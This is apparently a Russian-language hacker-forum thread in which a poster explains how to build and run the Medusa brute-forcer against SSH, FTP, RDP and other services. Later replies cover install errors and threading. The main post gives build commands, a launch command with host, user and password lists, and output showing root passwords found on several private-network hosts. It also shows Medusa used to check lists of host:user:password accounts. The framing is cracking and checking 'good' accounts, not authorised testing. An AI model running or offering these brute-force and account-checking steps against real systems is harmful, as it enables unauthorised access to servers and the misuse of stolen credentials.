Частенько проскакивают сообщения о том как брутить ssh , а так же и других демонов .На счет брута SSH все в упор кричат hydra , он самый лучший и самый самый, но это не так .После двух часов брута на нескольких потоков он у меня нагло падал в кору , помогало только перезапуск и если смотреть на скорость то показывал не особо хорошие результаты .Но есть и другой брут medusa , так же поддерживает огромное количество модулей к различным сервисам. Вот список того что он поддерживает: Code: AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP, PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC Плюс к тому же еще и RDP в связке с rdesktop. Скачать последнию версию можно с сайта разработчиков www.foofus.net. Для брута SSH потребуется таже библиотека что и для hydra - libssh2. Качаем и ставим в начале библиотеку Code: wget http://downloads.sourceforge.net/project/libssh2/libssh2/1.1/libssh2-1.1.tar.gz?use_mirror=sunet И ставим ее Code: tar -zxvf libssh2-1.1.tar.gz cd libssh2-1.1 ./configure && make && make install Качаем медузу Code: wget http://www.foofus.net/jmk/tools/medusa-1.5.tar.gz tar -zxvf medusa-1.5.tar.gz cd medusa-1.5 ./configure Если библиотека встала нормально то после конфигурации PHP: configure: Medusa Module Build Summary configure: configure: AFP ** Disabled ** configure: CVS Enabled configure: FTP Enabled configure: HTTP Enabled configure: IMAP Enabled configure: MSSQL Enabled configure: MYSQL Enabled configure: NCP ** Disabled ** configure: NNTP Enabled configure: PCANYWHERE Enabled configure: POP3 Enabled configure: POSTGRES ** Disabled ** configure: REXEC Enabled configure: RLOGIN Enabled configure: RSH Enabled configure: SMBNT Enabled configure: SMTP Enabled configure: SMTP-VRFY Enabled configure: SNMP Enabled configure: SSH Enabled configure: SVN ** Disabled ** configure: TELNET Enabled configure: VMAUTHD Enabled configure: VNC Enabled configure: WRAPPER Enabled configure: WEB-FORM Enabled SSH будет открыт , сразу компилим и ставим . Code: make && make install И смотрим как встали модуль для медусы Code: medusa -d + cvs.mod : Brute force module for CVS sessions : version 1.0.0 + ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0 + http.mod : Brute force module for HTTP : version 1.3.0 + imap.mod : Brute force module for IMAP sessions : version 1.2.0 + mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1 + mysql.mod : Brute force module for MySQL sessions : version 1.2 + nntp.mod : Brute force module for NNTP sessions : version 1.0.0 + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2 + pop3.mod : Brute force module for POP3 sessions : version 1.2 + rexec.mod : Brute force module for REXEC sessions : version 1.1.1 + rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2 + rsh.mod : Brute force module for RSH sessions : version 1.0.1 + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5 + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0 + smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0 + snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0 + ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2 + telnet.mod : Brute force module for telnet sessions : version 1.2.2 + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1 + vnc.mod : Brute force module for VNC sessions : version 1.0.1 + web-form.mod : Brute force module for web forms : version 1.0.0 + wrapper.mod : Generic Wrapper Module : version 1.0.1 Запускаем с 3 потоками Code: medusa -T 3 -H hosts.txt -U users.txt -P password.txt -O good.txt -M ssh PHP: ACCOUNT CHECK: [ssh] Host: 172.16.0.16 (3 of 6, 1 complete) User: root (1 of 1, 1 complete) Password: admin (1 of 5 complete) ACCOUNT CHECK: [ssh] Host: 172.16.0.92 (1 of 6, 1 complete) User: root (1 of 1, 1 complete) Password: admin (1 of 5 complete) ACCOUNT CHECK: [ssh] Host: 172.16.0.92 (1 of 6, 1 complete) User: root (1 of 1, 1 complete) Password: superpass (2 of 5 complete) ACCOUNT FOUND: [ssh] Host: 172.16.0.92 User: root Password: superpass [SUCCESS] ACCOUNT CHECK: [ssh] Host: 172.16.0.3 (2 of 6, 2 complete) User: root (1 of 1, 1 complete) Password: admin (1 of 5 complete) ACCOUNT CHECK: [ssh] Host: 172.16.0.3 (2 of 6, 2 complete) User: root (1 of 1, 1 complete) Password: superpass (2 of 5 complete) ACCOUNT FOUND: [ssh] Host: 172.16.0.3 User: root Password: superpass[SUCCESS] CRITICAL: Failed to resolve hostname: 172.16.0.8172.16.0.92 ACCOUNT CHECK: [ssh] Host: 172.16.0.16 (3 of 6, 4 complete) User: root (1 of 1, 1 complete) Password: superpass (2 of 5 complete) ACCOUNT CHECK: [ssh] Host: 172.16.0.16 (3 of 6, 4 complete) User: root (1 of 1, 1 complete) Password: wew33w@ (3 of 5 complete) ACCOUNT CHECK: [ssh] Host: 172.16.0.8 (6 of 6, 4 complete) User: root (1 of 1, 1 complete) Password: admin (1 of 5 complete) ACCOUNT CHECK: [ssh] Host: 172.16.0.8 (6 of 6, 4 complete) User: root (1 of 1, 1 complete) Password: superpass (2 of 5 complete) ACCOUNT FOUND: [ssh] Host: 172.16.0.8 User: root Password: superpass[SUCCESS] ACCOUNT CHECK: [ssh] Host: 172.16.0.16 (3 of 6, 5 complete) User: root (1 of 1, 1 complete) Password: support (4 of 5 complete) ACCOUNT CHECK: [ssh] Host: 172.16.0.18 (4 of 6, 5 complete) User: root (1 of 1, 1 complete) Password: admin (1 of 5 complete) ACCOUNT CHECK: [ssh] Host: 172.16.0.18 (4 of 6, 5 complete) User: root (1 of 1, 1 complete) Password: superpass (2 of 5 complete) ACCOUNT FOUND: [ssh] Host: 172.16.0.18 User: root Password: superpass [SUCCESS] ACCOUNT CHECK: [ssh] Host: 172.16.0.16 (3 of 6, 6 complete) User: root (1 of 1, 1 complete) Password: mail (5 of 5 complete) И смотри в лог фаил Code: cat good.txt PHP: [root@localhost brr]# cat good # Medusa v.1.5 (2009-07-24 19:56:33) # /usr/local/bin/medusa -T 3 -H hosts -U users -P password -O good -M ssh ACCOUNT FOUND: [ssh] Host: 172.16.0.92 User: root Password: superpass [SUCCESS] ACCOUNT FOUND: [ssh] Host: 172.16.0.3 User: root Password: superpass[SUCCESS] ACCOUNT FOUND: [ssh] Host: 172.16.0.8 User: root Password: superpass[SUCCESS] ACCOUNT FOUND: [ssh] Host: 172.16.0.18 User: root Password: superpass [SUCCESS] # Medusa has finished (2009-07-24 19:56:42). На бруте SSH он не останавливается , им так же можно брутить и фтп и рдп ( имхо не особо порадовало , очень много пропусков из за того что патч для rdesktop не поддерживает ответы системы на языках отличных от инглиша ). Как оказалось , не обратил внимания , она еще и без проблем чекает акки , то-есть какие модули подключенны те и чекает , в том числе и фтп и ssh , мыло и т.д.Но фотмат записи другой .Содаем файлик с содержимым Code: 172.16.0.3:root:superpass Формат файла может быть и таким Code: host:username:password host:username: host:: :username:password :username: ::password host::password И запускаем medusa в качестве чекера Code: medusa -M ssh -C hosts Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]> ACCOUNT CHECK: [ssh] Host: 172.16.0.3 (1 of 1, 1 complete) User: root (1 of 1, 1 complete) Password: superpass (1 of 1 complete) ACCOUNT FOUND: [ssh] Host: 172.16.0.3 User: root Password: superpass [SUCCESS] Точно так же будет и чекать остальные акки , указав еще и лог для сохранения , все гуд акки будут складываться туда. (С)n0klos
искал брут ссш в гугле выдал в первых 10. попробовал. 1 поток. брут ссш в процессе) потом попробую фтп
подскажите, что за ошбка? medusa -d Available modules in "." : Available modules in "/usr/local/lib/medusa/modules" : + cvs.mod : Couldn't load "/usr/local/lib/medusa/modules/cvs.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + ftp.mod : Couldn't load "/usr/local/lib/medusa/modules/ftp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + http.mod : Couldn't load "/usr/local/lib/medusa/modules/http.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + imap.mod : Couldn't load "/usr/local/lib/medusa/modules/imap.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + mssql.mod : Couldn't load "/usr/local/lib/medusa/modules/mssql.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + mysql.mod : Couldn't load "/usr/local/lib/medusa/modules/mysql.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + nntp.mod : Couldn't load "/usr/local/lib/medusa/modules/nntp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + pcanywhere.mod : Couldn't load "/usr/local/lib/medusa/modules/pcanywhere.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + pop3.mod : Couldn't load "/usr/local/lib/medusa/modules/pop3.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + rexec.mod : Couldn't load "/usr/local/lib/medusa/modules/rexec.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + rlogin.mod : Couldn't load "/usr/local/lib/medusa/modules/rlogin.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + rsh.mod : Couldn't load "/usr/local/lib/medusa/modules/rsh.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + smbnt.mod : Couldn't load "/usr/local/lib/medusa/modules/smbnt.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + smtp-vrfy.mod : Couldn't load "/usr/local/lib/medusa/modules/smtp-vrfy.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + smtp.mod : Couldn't load "/usr/local/lib/medusa/modules/smtp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + snmp.mod : Couldn't load "/usr/local/lib/medusa/modules/snmp.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + ssh.mod : Couldn't load "/usr/local/lib/medusa/modules/ssh.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + telnet.mod : Couldn't load "/usr/local/lib/medusa/modules/telnet.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + vmauthd.mod : Couldn't load "/usr/local/lib/medusa/modules/vmauthd.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + vnc.mod : Couldn't load "/usr/local/lib/medusa/modules/vnc.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + web-form.mod : Couldn't load "/usr/local/lib/medusa/modules/web-form.mod" [libssh2.so.1: cannot open shared object file: No such file or directory] + wrapper.mod : Couldn't load "/usr/local/lib/medusa/modules/wrapper.mod" [libssh2.so.1: cannot open shared object file: No such file or directory]
Только что опробывал медузу... и распараллеливание там сделано не очень, например: 1. Можно брутить несколько логенов одновременно 2. Можно брутить несколько хостов одновременно Но брутить один хост и один логен в несколько потоков НЕЛЬЗЯ :/
хм как не странно но все работает!и ставить её проще простой командой sudo apt-get и все либы ставятся и сразу же готова к работе!
medusa -d Code: Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]> Available modules in "." : Available modules in "/usr/local/lib/medusa/modules" : + cvs.mod : Brute force module for CVS sessions : version 2.0 + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0 + http.mod : Brute force module for HTTP : version 2.0 + imap.mod : Brute force module for IMAP sessions : version 2.0 + mssql.mod : Brute force module for M$-SQL sessions : version 2.0 + mysql.mod : Brute force module for MySQL sessions : version 2.0 + nntp.mod : Brute force module for NNTP sessions : version 2.0 + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0 + pop3.mod : Brute force module for POP3 sessions : version 2.0 + rexec.mod : Brute force module for REXEC sessions : version 2.0 + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0 + rsh.mod : Brute force module for RSH sessions : version 2.0 + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0 + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0 + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0 + snmp.mod : Brute force module for SNMP Community Strings : version 2.0 + telnet.mod : Brute force module for telnet sessions : version 2.0 + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0 + vnc.mod : Brute force module for VNC sessions : version 2.0 + web-form.mod : Brute force module for web forms : version 2.0 + wrapper.mod : Generic Wrapper Module : version 2.0 Тут вроде все ОК но если запускаю что то типо medusa -T 3 -H host.txt -U users.txt -P password.txt -O good.txt -M ssh Вижу ошибку Code: Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]> IMPORTANT: Couldn't load "ssh" [/usr/local/lib/medusa/modules/ssh.mod: cannot open shared object file: No such file or directory]. Place the module in the medusa directory, set the MEDUSA_MODULE_NAME environment variable or run the configure script again using --with-default-mod-path=[path]. IMPORTANT: Couldn't load "ssh" [/usr/local/lib/medusa/modules/ssh.mod: cannot open shared object file: No such file or directory]. Place the module in the medusa directory, set the MEDUSA_MODULE_NAME environment variable or run the configure script again using --with-default-mod-path=[path]. invokeModule failed - see previous errors for an explanation
